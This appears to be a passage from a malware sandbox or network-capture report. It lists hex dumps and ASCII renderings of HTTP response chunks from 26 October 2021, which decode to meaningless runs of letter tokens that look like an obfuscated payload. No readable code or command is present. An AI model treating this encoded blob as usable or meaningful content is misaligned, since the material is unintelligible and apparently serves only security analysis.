                                                                                                Data Ascii: TTM PM Mp MS MO Tpg TTi TTT pO Mgn PS iU PM MU Ui On pO TSP TTM TpO iU PS Pi np TTi TTn TMi TSP TOT TgO PS Pi UP TSU nO TU TTM PS iU MS iU pp TpM TSS TSO TTM PT Mi TTp Pi Ui TMS MTP TSn TSg MMp gM PS Pi UP OS PT TSO TTM Pp Tip PM ip TgM TMP TTn TSO TTg M
                                                                                                2021-10-26 15:34:19 UTC19INData Raw: 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 70 20 50 53 20 4f 70 20 50 53 20 50 69 20 55 69 20 54 53 50 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 70 6e 20 6e 4d 20 50 69 20 55 69 20 54 4d 53 20 54 54 53 20 70 69 20 54 4d 67 20 4d 53 20 50 50 20 4f 67 20 6e 50 20 55 69 20 54 54 69 20 54 4d 6e 20 70 69 20 54 54 4f 20 4d 50 20 50 54 20 50 6e 20 4d 4f 20 54 70 6e 20 54 53 53 20 4f 50 20 54 53 70 20 67 54 20 6e 55 20 69 55 20 50 53 20 70 53 20 55 6e 20 4f 4d 20 54 54 4f 20 54 4d 67 20 4f 53 20 50 67 20 4f 50 20 6e 67 20 50 69 20 55 69 20 54 4d 53 20 54 53 69 20 70 69 20 54 53 4f 20 4d 53 20 50 70 20 4d 70 20 55 6e 20 55 50 20 54 54 69 20 54 54 50 20 54 54 70 20 4f 67 20 67 70 20 4d 4d 20 50 55 20 55 4f 20 69 50 20 54 54 69 20 54 54 6e 20 54 53
                                                                                                Data Ascii: Pi Ui TTP TSM Og TTp PS Op PS Pi Ui TSP TTn TSO On iU pn nM Pi Ui TMS TTS pi TMg MS PP Og nP Ui TTi TMn pi TTO MP PT Pn MO Tpn TSS OP TSp gT nU iU PS pS Un OM TTO TMg OS Pg OP ng Pi Ui TMS TSi pi TSO MS Pp Mp Un UP TTi TTP TTp Og gp MM PU UO iP TTi TTn TS
                                                                                                2021-10-26 15:34:19 UTC20INData Raw: 20 4d 67 53 20 67 4f 20 55 54 20 4d 4f 20 54 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 50 69 20 4d 69 20 67 6e 20 54 53 53 20 54 54 4f 20 54 54 6e 20 70 4f 20 54 54 4d 20 50 53 20 69 55 20 69 50 20 50 69 20 55 69 20 4f 4f 20 54 54 4f 20 54 54 70 20 54 53 69 20 70 50 20 6e 53 20 50 53 20 50 69 20 4f 69 20 54 53 55 20 55 55 20 54 54 4f 20 55 70 20 50 4d 20 50 4d 20 4f 67 20 54 55 67 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 6e 20 54 54 50 20 67 70 20 50 54 20 54 55 55 20 54 4d 4f 20 50 4f 20 54 53 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 50 4d 20 4f 50 20 6e 50 20 50 69 20 55 69 20 54 4d 53 20 4f 50 20 54 53 67 20 4f 54 20 4d 54 69 20 50 54 20 4d 20 70 67 20 55 69 20 50 53 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 70 20 4f 53
                                                                                                Data Ascii: MgS gO UT MO TM TSO TTM Pp Pi Mi gn TSS TTO TTn pO TTM PS iU iP Pi Ui OO TTO TTp TSi pP nS PS Pi Oi TSU UU TTO Up PM PM Og TUg Ui TTi TMn TSn TTP gp PT TUU TMO PO TS TTn TSO TMM PM OP nP Pi Ui TMS OP TSg OT MTi PT M pg Ui PS TTn TSO TTM PS iU PS Pi Up OS
                                                                                                2021-10-26 15:34:19 UTC21INData Raw: 54 69 20 54 54 6e 20 54 54 54 20 54 54 20 4d 67 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 54 50 20 4f 50 20 54 54 54 20 54 53 67 20 67 70 20 4d 55 20 67 70 20 54 70 20 54 54 69 20 54 54 4d 20 54 69 20 6e 50 20 54 54 4d 20 50 53 20 50 4d 20 67 70 20 50 4d 20 69 6e 20 55 70 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 54 55 67 20 50 53 20 50 69 20 4f 69 20 55 69 20 4f 50 20 54 70 20 55 50 20 50 53 20 69 55 20 50 69 20 4d 4f 20 54 6e 6e 20 54 54 69 20 54 54 55 20 4f 67 20 54 4d 54 20 50 53 20 4d 4d 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 6e 50 20 4d 67 20 50 69 20 55 69 20 54 54 55 20 55 55 20 54 53 55 20 4f 53 20 69 55 20 67 55 20 69 53 20 4d 6e 20 70 4f 20 55 69 20 55 67 20 54 54 54 20 54 54 20 4d 53 20
                                                                                                Data Ascii: Ti TTn TTT TT Mg iU PS PS TMS TTP OP TTT TSg gp MU gp Tp TTi TTM Ti nP TTM PS PM gp PM in Up TTn TSO TTp Og TUg PS Pi Oi Ui OP Tp UP PS iU Pi MO Tnn TTi TTU Og TMT PS MM PS Pi Ui TTi TTn TSO TTM iU nP Mg Pi Ui TTU UU TSU OS iU gU iS Mn pO Ui Ug TTT TT MS
                                                                                                2021-10-26 15:34:19 UTC23INData Raw: 54 69 20 54 54 67 20 54 54 53 20 67 54 20 54 4f 54 20 69 55 20 50 53 20 70 53 20 55 53 20 4f 53 20 67 4f 20 54 53 4f 20 54 54 4d 20 50 70 20 4f 50 20 4f 6e 20 50 69 20 55 69 20 54 4d 53 20 55 4f 20 54 54 54 20 54 6e 69 20 54 54 67 20 50 53 20 6e 67 20 67 54 20 55 69 20 54 54 69 20 54 54 67 20 54 54 53 20 54 54 70 20 4d 70 20 4f 55 20 50 53 20 50 69 20 4f 69 20 4d 4f 20 4d 50 54 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 67 55 20 69 54 20 50 4d 20 69 6e 20 4f 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 69 4f 20 50 4d 20 4d 70 20 54 53 53 20 55 69 20 54 54 69 20 54 4d 6e 20 4d 20 4d 50 50 20 50 53 20 69 55 20 50 70 20 4d 67 4d 20 55 67 20 54 54 70 20 4f 67 20 4d 67 54 20 54 54 4d 20 50 53 20 50 55 20 4d 67 55 20 50 4d 20 69 6e 20 4f 53 20 54 54 6e 20 54 53 4f 20
                                                                                                Data Ascii: Ti TTg TTS gT TOT iU PS pS US OS gO TSO TTM Pp OP On Pi Ui TMS UO TTT Tni TTg PS ng gT Ui TTi TTg TTS TTp Mp OU PS Pi Oi MO MPT TSO TTM Pp MgU iT PM in OT TTn TSO TTp iO PM Mp TSS Ui TTi TMn M MPP PS iU Pp MgM Ug TTp Og MgT TTM PS PU MgU PM in OS TTn TSO
                                                                                                2021-10-26 15:34:19 UTC24INData Raw: 4d 69 20 4d 67 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 4f 55 20 50 53 20 50 69 20 4f 69 20 4f 53 20 4d 4d 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 67 67 20 50 4d 20 55 4f 20 54 4f 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 55 20 50 54 20 4d 69 20 54 6e 53 20 50 69 20 55 69 20 54 4d 53 20 55 55 20 54 6e 69 20 54 4d 53 20 4f 67 20 54 70 4f 20 50 53 20 50 69 20 4f 69 20 54 4d 53 20 54 6e 54 20 54 53 70 20 54 4d 54 20 4d 70 20 54 55 70 20 50 53 20 50 69 20 4f 69 20 54 6e 69 20 54 54 50 20 6e 54 20 54 54 67 20 67 69 20 69 55 20 50 53 20 50 4d 20 55 69 20 54 53 67 20 54 54 6e 20 54 54 20 54 54 20 50 53 20 50 50 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 53 4d 20 4f 67 20 54 54 69 20 50 53 20 69 6e 20 50 53 20 50 69 20 55 69 20 55 6e 20 54 54 6e 20
                                                                                                Data Ascii: Mi MgT TTn TSO TMM Mp OU PS Pi Oi OS MMn TSO TTM Pp gg PM UO TOP TTi TTn TSg OU PT Mi TnS Pi Ui TMS UU Tni TMS Og TpO PS Pi Oi TMS TnT TSp TMT Mp TUp PS Pi Oi Tni TTP nT TTg gi iU PS PM Ui TSg TTn TT TT PS PP PS Pi Ui TTi TSM Og TTi PS in PS Pi Ui Un TTn
                                                                                                2021-10-26 15:34:19 UTC25INData Raw: 69 20 54 54 69 20 54 54 50 20 70 4f 20 4d 50 53 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 70 69 20 50 69 20 69 55 20 6e 6e 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 20 54 55 67 20 50 69 20 55 69 20 54 54 70 20 54 54 54 20 70 69 20 53 20 4d 53 20 6e 55 20 54 54 67 20 50 69 20 55 69 20 54 54 55 20 4f 6e 20 54 69 6e 20 54 54 55 20 54 50 53 20 69 55 20 50 53 20 69 55 20 67 4f 20 4d 53 6e 20 54 54 70 20 54 53 4f 20 54 54 55 20 4f 67 20 4f 54 20 50 54 20 50 69 20 55 4d 20 54 4d 20 50 69 20 54 53 4f 20 54 54 4d 20 50 69 20 67 70 20 4d 53 69 20 69 55 20 4d 69 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 67 20 54 67 50 20 69 4f 20 50 53 20 69 55 20 50 4f 20 4d 4f 20 54 54 70 20 54 53
                                                                                                Data Ascii: i TTi TTP pO MPS PS iU PM MU Ui TTi TTn TTS pi Pi iU nn Pi Ui TTi TTn TSO TTM PS Mi TUg Pi Ui TTp TTT pi S MS nU TTg Pi Ui TTU On Tin TTU TPS iU PS iU gO MSn TTp TSO TTU Og OT PT Pi UM TM Pi TSO TTM Pi gp MSi iU MiT TTi TTn TSn g TgP iO PS iU PO MO TTp TS
                                                                                                2021-10-26 15:34:19 UTC27INData Raw: 20 4d 50 20 54 53 20 50 6e 20 4d 4f 20 54 6e 50 20 4f 70 20 54 54 70 20 70 4f 20 4d 4d 6e 20 50 53 20 69 55 20 50 70 20 69 69 20 54 4d 54 20 55 55 20 55 67 20 6e 6e 20 4d 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 55 20 50 53 20 4d 69 20 54 70 70 20 50 69 20 55 69 20 54 4d 53 20 54 53 67 20 54 53 4f 20 55 55 20 54 70 6e 20 69 55 20 50 53 20 70 53 20 54 4d 69 20 67 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 54 50 6e 20 50 53 20 50 69 20 4f 69 20 4f 53 20 54 4f 4d 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 6e 20 69 4f 20 70 53 20 54 4d 6e 20 54 70 70 20 54 53 67 20 54 53 55 20 55 55 20 54 6e 53 20 69 55 20 50 53 20 70 53 20 54 4d 54 20 54 6e 55 20 54 6e 54 20 4f 4f 20 4f 55 20 50 54 20 4d 53 70 20 67 70
                                                                                                Data Ascii: MP TS Pn MO TnP Op TTp pO MMn PS iU Pp ii TMT UU Ug nn M TU MMi ii gS TnT TTi TTn TSn OU PS Mi Tpp Pi Ui TMS TSg TSO UU Tpn iU PS pS TMi gM TTn TSO TMM Mp TPn PS Pi Oi OS TOM TSO TTM PM Mn iO pS TMn Tpp TSg TSU UU TnS iU PS pS TMT TnU TnT OO OU PT MSp gp
                                                                                                2021-10-26 15:34:19 UTC28INData Raw: 55 54 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 54 54 6e 20 6e 54 20 54 53 67 20 67 6e 20 69 4f 20 4d 70 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 4f 20 54 54 4d 20 54 54 4d 20 4d 69 53 20 50 53 20 50 70 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 50 53 20 4d 50 69 20 50 53 20 4d 4f 20 54 6e 67 20 54 54 69 20 54 4d 67 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 54 54 69 20 54 54 69 20 54 50 53 20 54 53 53 20 54 54 67 20 54 55 20 54 54 55 20 50 53 20 50 69 20 55 50 20 54 53 50 20 70 4f 20 54 54 53 20 54 54 4d 20 54 70 69 20 69 55 20 50 53 20 50 69 20 54 4d 50 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 69 20 6e 4f 20 69 55 20 50 53 20 50 53 20 54 54 70 20 54 70 20 55 50 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20
                                                                                                Data Ascii: UT PS Pi Oi TnM TTn nT TSg gn iO Mp Pi Ui TTM TTn TO TTM TTM MiS PS Pp Ui TTi TTn TSO TTi PS MPi PS MO Tng TTi TMg TSO TTM PS iU PS Pi TTi TTi TPS TSS TTg TU TTU PS Pi UP TSP pO TTS TTM Tpi iU PS Pi TMP TTi TTn TMi Ti nO iU PS PS TTp Tp UP TUO TTS Mp MSn
                                                                                                2021-10-26 15:34:19 UTC29INData Raw: 54 53 53 20 54 53 50 20 4d 67 69 20 6e 50 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 67 20 70 54 20 54 53 4f 20 54 54 4d 20 50 54 20 6e 6e 20 69 50 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 69 20 54 4d 54 20 67 50 20 50 4d 20 67 6e 20 54 54 53 20 4d 53 70 20 54 54 20 6e 54 20 54 53 4f 20 54 54 4d 20 50 54 20 70 50 20 53 20 50 69 20 55 69 20 54 54 50 20 55 20 54 54 50 20 54 54 4d 20 50 53 20 50 4d 20 67 4d 20 50 54 20 4f 67 20 4f 4f 20 54 54 67 20 54 54 6e 20 69 53 20 54 70 55 20 70 55 20 54 50 67 20 50 69 20 55 69 20 54 54 50 20 55 20 6e 6e 20 54 54 4d 20 50 53 20 50 4d 20 67 4d 20 50 54 20 4f 67 20 4f 4f 20 54 54 67 20 54 54 70 20 69 53 20 54 70 55 20 70 55 20 50 70 20 50 69 20 55 69 20 54 53 50 20 55 20 6e 4f 20 54 54 4d 20 50 53 20 50 4d 20 67
                                                                                                Data Ascii: TSS TSP Mgi nP TMS PS Pi UP g pT TSO TTM PT nn iP Pi Ui TTU TSg TSi TMT gP PM gn TTS MSp TT nT TSO TTM PT pP S Pi Ui TTP U TTP TTM PS PM gM PT Og OO TTg TTn iS TpU pU TPg Pi Ui TTP U nn TTM PS PM gM PT Og OO TTg TTp iS TpU pU Pp Pi Ui TSP U nO TTM PS PM g
                                                                                                2021-10-26 15:34:19 UTC31INData Raw: 54 54 20 67 4d 20 69 55 20 50 53 20 50 53 20 54 4d 54 20 54 54 4d 20 4f 69 20 55 6e 20 54 4d 53 20 50 4f 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 54 20 54 4d 54 20 6e 67 20 70 67 20 50 53 20 50 69 20 55 53 20 4d 50 69 20 6e 54 20 54 53 4f 20 54 54 4d 20 50 54 20 4f 50 20 54 53 50 20 50 69 20 55 69 20 54 4d 53 20 54 4d 50 20 54 53 53 20 54 54 20 67 69 20 69 55 20 50 53 20 50 53 20 50 4f 20 69 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 50 55 20 50 6e 20 6e 67 20 67 6e 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 69 67 20 50 53 20 69 55 20 50 70 20 67 70 20 55 54 20 4f 53 20 4d 67 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 4f 20 54 50 67 20 4d 67
                                                                                                Data Ascii: TT gM iU PS PS TMT TTM Oi Un TMS PO nP gP Pi Ui TTU MiO gn TTM PS iO Og TSO Ui TTi TMn TST TMT ng pg PS Pi US MPi nT TSO TTM PT OP TSP Pi Ui TMS TMP TSS TT gi iU PS PS PO iT TTn TSO TMM PU Pn ng gn Ui TTi TTg M ig PS iU Pp gp UT OS Mg TSO TTM Pp MO TPg Mg
                                                                                                2021-10-26 15:34:19 UTC32INData Raw: 20 54 53 4f 20 54 54 70 20 67 53 20 69 4f 20 4d 69 20 67 67 20 70 50 20 6e 4d 20 4d 54 50 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 4d 20 70 50 20 4d 69 70 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 55 20 6e 69 20 54 69 70 20 69 55 20 50 53 20 50 69 20 54 54 69 20 54 20 54 4f 20 54 53 4f 20 54 54 4d 20 50 70 20 69 53 20 55 20 54 70 55 20 55 69 20 54 54 69 20 54 54 6e 20 6e 50 20 54 53 53 20 4d 53 69 20 50 69 20 54 69 70 20 50 69 20 55 69 20 54 54 70 20 70 20 70 4f 20 54 54 4d 20 50 53 20 50 69 20 70 50 20 4f 70 20 55 69 20 54 54 69 20 54 54 50 20 4d 67 6e 20 6e 50 20 50 53 20 69 55 20 50 69 20 67 69 20 54 6e 53 20 54 54 70 20 4d 54 4d 20 54 53 4f 20 54 54 4d 20 50 4d 20 70 6e 20 4d 70 20 50 69 20 55 69 20 54 54 70 20 70 20 50 4f 20 54 54 4d 20 50 53 20 50 69
                                                                                                Data Ascii: TSO TTp gS iO Mi gg pP nM MTP TSO TTM PS MM pP Mip Ui TTi TMn TTU ni Tip iU PS Pi TTi T TO TSO TTM Pp iS U TpU Ui TTi TTn nP TSS MSi Pi Tip Pi Ui TTp p pO TTM PS Pi pP Op Ui TTi TTP Mgn nP PS iU Pi gi TnS TTp MTM TSO TTM PM pn Mp Pi Ui TTp p PO TTM PS Pi
                                                                                                2021-10-26 15:34:19 UTC33INData Raw: 4d 69 4d 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 54 53 69 20 50 53 20 50 69 20 55 4d 20 54 4d 20 6e 55 20 54 53 4f 20 54 54 4d 20 50 69 20 54 70 20 4d 67 50 20 4d 53 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 54 55 67 20 55 69 20 54 54 69 20 54 54 67 20 4d 4d 50 20 70 4d 20 50 53 20 69 55 20 50 54 20 55 4f 20 54 4d 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 53 20 50 53 20 69 55 20 69 4f 20 70 20 55 6e 20 54 54 69 20 4d 54 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 55 4d 20 54 55 69 20 6e 4f 20 54 70 53 20 69 69 20 4d 69 20 4d 53 50 20 50 69 20 55 69 20 54 54 70 20 54 53 4f 20 70 69 20 6e 55 20 4d 53 20 6e 55 20 6e 6e 20 50 69 20 55 69 20 54 54 55 20 54 54 20 4d 67 6e 20 54 54
                                                                                                Data Ascii: MiM TTn TSO TTp Og TSi PS Pi UM TM nU TSO TTM Pi Tp MgP MS TgM TSU Og Tip TTM PS Pi np TUg Ui TTi TTg MMP pM PS iU PT UO TM TTi TTn TSn OS PS iU iO p Un TTi MT TSO TTM PS iU PS Pi Ui UM TUi nO TpS ii Mi MSP Pi Ui TTp TSO pi nU MS nU nn Pi Ui TTU TT Mgn TT
                                                                                                2021-10-26 15:34:19 UTC35INData Raw: 55 69 20 54 54 69 20 54 54 67 20 54 4f 20 50 67 20 50 53 20 69 55 20 50 69 20 67 53 20 54 4d 50 20 54 54 50 20 54 54 6e 20 54 53 6e 20 4f 6e 20 50 69 20 67 67 20 50 69 20 55 4f 20 54 50 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20 67 54 20 4d 69 55 20 69 55 20 50 53 20 70 53 20 6e 54 20 54 4d 67 20 54 53 53 20 54 53 53 20 55 55 20 4d 50 20 69 4f 20 50 53 20 69 55 20 6e 54 20 54 54 6e 20 54 53 53 20 54 53 70 20 4f 6e 20 50 4d 20 54 6e 53 20 6e 50 20 54 4d 4d 20 55 69 20 54 54 69 20 54 54 70 20 4d 55 20 70 53 20 50 53 20 69 55 20 50 54 20 67 67 20 54 67 20 54 53 54 20 69 50 20 4d 4d 69 20 4d 20 50 53 20 69 55 20 50 54 20 67 6e 20 4f 4d 20 4f 4f 20 54 54 50 20 54 4d 4d 20 69 53 20 67 67 20 50 69 20 67 50 20 69 4f 20 70 4f 20 54 54 70 20 54 53 53 20 54 53 54 20
                                                                                                Data Ascii: Ui TTi TTg TO Pg PS iU Pi gS TMP TTP TTn TSn On Pi gg Pi UO TPn TTi TTn TSg gT MiU iU PS pS nT TMg TSS TSS UU MP iO PS iU nT TTn TSS TSp On PM TnS nP TMM Ui TTi TTp MU pS PS iU PT gg Tg TST iP MMi M PS iU PT gn OM OO TTP TMM iS gg Pi gP iO pO TTp TSS TST
                                                                                                2021-10-26 15:34:19 UTC36INData Raw: 4d 20 55 4d 20 4d 67 4d 20 54 4d 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 70 6e 20 54 4d 70 20 55 69 20 54 54 69 20 54 54 70 20 54 70 20 54 54 54 20 50 53 20 69 55 20 50 69 20 67 70 20 55 50 20 54 54 4d 20 54 54 50 20 54 4d 4d 20 69 53 20 54 70 55 20 6e 67 20 53 20 50 69 20 55 69 20 54 54 50 20 69 20 4f 50 20 54 54 4d 20 50 53 20 69 4f 20 6e 4f 20 69 53 20 55 69 20 54 54 69 20 54 54 67 20 54 4d 6e 20 54 54 67 20 69 55 20 50 69 20 69 4d 20 54 54 53 20 4d 53 70 20 70 20 4d 4d 4d 20 54 53 4f 20 54 54 4d 20 50 54 20 6e 6e 20 54 55 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 55 20 54 54 69 20 50 4d 20 69 54 20 54 53 70 20 54 6e 4d 20 67 4d 20 54 4d 53 20 54 54 6e 20 54 53 4f 20 54 53 6e 20 6e 4f 20 54 55 20 50 53 20 50 69 20 55 53 20 4f 70 20 54 54 70
                                                                                                Data Ascii: M UM MgM TM gn TTM PS iO pn TMp Ui TTi TTp Tp TTT PS iU Pi gp UP TTM TTP TMM iS TpU ng S Pi Ui TTP i OP TTM PS iO nO iS Ui TTi TTg TMn TTg iU Pi iM TTS MSp p MMM TSO TTM PT nn TU Pi Ui TTU TSg TSU TTi PM iT TSp TnM gM TMS TTn TSO TSn nO TU PS Pi US Op TTp
                                                                                                2021-10-26 15:34:19 UTC37INData Raw: 54 69 20 54 54 70 20 54 4d 50 20 54 54 69 20 4f 70 20 4f 67 20 4d 67 53 20 50 53 20 50 69 20 4f 69 20 4d 4f 20 54 70 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 50 69 20 50 55 20 69 54 20 70 55 20 4d 4f 20 54 70 67 20 54 53 4f 20 54 54 4d 20 50 70 20 4f 50 20 4d 67 69 20 50 69 20 55 69 20 54 4d 53 20 54 54 50 20 4d 20 54 70 4f 20 50 53 20 69 55 20 50 70 20 50 4d 20 70 70 20 54 54 4d 20 4d 50 54 20 4d 54 55 20 67 54 20 4d 67 4d 20 69 55 20 50 53 20 70 53 20 54 4d 70 20 54 4d 70 20 4f 69 20 54 6e 53 20 54 4d 4d 20 4d 50 20 4d 50 67 20 69 54 20 70 20 55 6e 20 54 54 69 20 4d 20 54 53 4f 20 54 54 4d 20 50 53 20 69 20 50 53 20 50 69 20 70 4f 20 4f 53 20 50 67 20 54 53 55 20 54 54 4d 20 50 4d 20 4d 4f 20 50 54 20 4d 55 20 54 4d 69 20 54 70 70 20 54 54 6e 20 54 53 4f
                                                                                                Data Ascii: Ti TTp TMP TTi Op Og MgS PS Pi Oi MO TpM TSO TTM Pp Pi PU iT pU MO Tpg TSO TTM Pp OP Mgi Pi Ui TMS TTP M TpO PS iU Pp PM pp TTM MPT MTU gT MgM iU PS pS TMp TMp Oi TnS TMM MP MPg iT p Un TTi M TSO TTM PS i PS Pi pO OS Pg TSU TTM PM MO PT MU TMi Tpp TTn TSO
                                                                                                2021-10-26 15:34:19 UTC39INData Raw: 54 70 20 54 53 69 20 55 6e 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 4d 4f 20 54 50 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 6e 20 69 4f 20 70 53 20 54 4d 6e 20 54 69 70 20 54 54 50 20 70 4f 20 54 69 55 20 50 53 20 69 55 20 50 70 20 54 70 20 54 4d 69 20 4d 50 53 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 67 70 20 4d 53 20 4d 67 20 67 53 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 53 70 20 67 54 20 69 53 20 4d 53 20 69 4f 20 54 54 70 20 54 54 70 20 55 6e 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 4f 53 20 54 4f 67 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 55 67 20 50 69 20 55 69 20 54 4d 53 20 54 6e 54 20 54 54 53 20 54 4d 67 20 4d 50 20 4d 54 69 20 4d 69 20 50 50 20 70 55 20 54 54
                                                                                                Data Ascii: Tp TSi Un TUO TTS Mp MSn PS Pi UM MO TPS TSO TTM Pp Mn iO pS TMn Tip TTP pO TiU PS iU Pp Tp TMi MPS TTn TSO TTU Mgp MS Mg gS Mi TTi TTn TSg TSp gT iS MS iO TTp TTp Un TUO TTS Mp MSn PS Pi UM OS TOg TSO TTM PM Mi Ug Pi Ui TMS TnT TTS TMg MP MTi Mi PP pU TT
                                                                                                2021-10-26 15:34:19 UTC40INData Raw: 4d 20 54 67 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 67 20 50 4d 20 4d 70 20 4d 67 67 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 6e 20 54 53 50 20 4d 70 20 4d 54 50 20 50 53 20 50 69 20 4f 69 20 4f 69 20 4f 70 20 54 4d 69 20 54 54 70 20 54 55 20 4d 69 4f 20 54 6e 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 4d 54 4f 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 50 20 4f 54 20 67 67 20 4d 69 20 4d 67 6e 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 4d 67 4f 20 54 54 4d 20 50 53 20 50 69 20 69 67 20 67 53 20 54 6e 4f 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 67 20 50 54 20 4d 70 20 67 50 20 50 53 20 54 54 70 20 4f 55 20 55 4d 20 54 53 4f 20 54 54 4d 20 4d 70 20 54 4f 53 20 50 53 20 50 69 20 55 4d 20 4f 69 20 54 54
                                                                                                Data Ascii: M Tg TTn TSO TTp gg PM Mp Mgg Ui TTi TMn TSn TSP Mp MTP PS Pi Oi Oi Op TMi TTp TU MiO Tn MgS ni OS TgU TSO TTM PM Mi MTO Pi Ui TMS TSM TSP OT gg Mi Mgn Pi Ui TMS Og MgO TTM PS Pi ig gS TnO TTi TTn TSg Og PT Mp gP PS TTp OU UM TSO TTM Mp TOS PS Pi UM Oi TT
                                                                                                2021-10-26 15:34:19 UTC41INData Raw: 20 70 53 20 54 4d 70 20 4f 70 20 54 54 4f 20 54 53 70 20 55 55 20 4d 4d 69 20 69 55 20 50 53 20 70 53 20 4f 4d 20 55 55 20 54 54 6e 20 54 53 4f 20 54 53 6e 20 4d 20 50 54 20 50 53 20 4f 70 20 55 69 20 54 54 69 20 54 54 6e 20 55 70 20 54 54 4d 20 50 53 20 67 67 20 69 50 20 69 69 20 54 4d 69 20 54 6e 4f 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 70 54 20 69 55 20 4d 53 69 20 67 4d 20 4d 55 20 54 54 69 20 54 54 6e 20 54 53 55 20 67 54 20 54 53 67 20 69 55 20 50 53 20 70 53 20 50 4f 20 54 67 69 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 54 50 4d 20 50 53 20 50 69 20 4f 69 20 54 53 53 20 55 4f 20 54 54 53 20 55 70 20 4d 50 20 50 54 20 50 70 20 4d 4f 20 55 69 20 54 54 70 20 4f 67 20 54 50 4d 20 54 54 4d 20 50 53 20 50 55 20 4d 53 20 4d 67 4d 20 54 54 4d 20 55
                                                                                                Data Ascii: pS TMp Op TTO TSp UU MMi iU PS pS OM UU TTn TSO TSn M PT PS Op Ui TTi TTn Up TTM PS gg iP ii TMi TnO TTn TSO TMM pT iU MSi gM MU TTi TTn TSU gT TSg iU PS pS PO Tgi TTn TSO TMM Mp TPM PS Pi Oi TSS UO TTS Up MP PT Pp MO Ui TTp Og TPM TTM PS PU MS MgM TTM U
                                                                                                2021-10-26 15:34:19 UTC43INData Raw: 55 20 4d 70 20 50 4d 20 4d 55 20 55 50 20 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 67 20 50 53 20 4d 54 20 67 53 20 54 54 69 20 54 53 6e 20 69 67 20 54 54 4d 20 50 53 20 69 4f 20 69 54 20 70 20 55 6e 20 54 54 69 20 70 4d 20 54 53 4f 20 54 54 4d 20 50 53 20 54 69 20 50 53 20 50 69 20 70 4f 20 54 4d 20 55 20 54 53 4f 20 54 54 4d 20 50 69 20 54 70 20 4d 4d 70 20 54 55 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 54 50 55 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 55 20 4f 67 20 69 4f 20 4d 4d 20 4d 50 20 50 67 20 4f 69 20 55 4f 20 54 54 6e 20 54 53 6e 20 54 54 69 20 4d 70 20 4d 53 69 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 55 54 20 6e 4d 20 55 55 20 54 4d 70 20 69 55 20 50 53 20 70 53 20 6e 55 20 4f
